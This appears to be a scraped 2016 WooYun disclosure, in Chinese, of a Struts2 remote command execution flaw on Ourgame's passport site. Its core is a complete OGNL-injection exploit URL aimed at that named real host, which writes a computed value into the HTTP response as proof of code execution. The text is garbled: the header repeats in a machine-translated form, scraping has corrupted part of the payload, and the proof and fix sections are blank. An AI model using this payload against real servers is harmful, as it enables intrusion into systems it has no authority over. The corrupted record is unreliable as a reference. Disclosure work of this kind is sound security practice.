联众世界重要站点st2命令执行

漏洞标题 联众世界重要站点st2命令执行 相关厂商 联众世界 漏洞作者 Mr .LZH 提交时间 2016-04-27 17:04 公开时间 2016-06-16 23:40 漏洞类型 命令执行 危害…

漏洞标题 联众世界重要站点st2命令执行 相关制造商 联合世界 漏洞作者 LZH先生 提交时间 2016-04-27 17: 04 公共时间 2016-06-16 23: 40 漏洞类型 命令执行 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 漏洞详细信息 http://passport.ourgame.com/ks.do?method: [email  protected]/* @ DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get(%23parameters.rpsobj [0]),%23w.getWriter()。println( 123456.123%2b123456.123),%23w.getWriter()。flush(),%23w.getWriter()。close(),1?%23xx:%23request.toString& reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest& rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse

漏洞证明: 修理计划: 版权声明:请注明来源Mr.LZH @乌云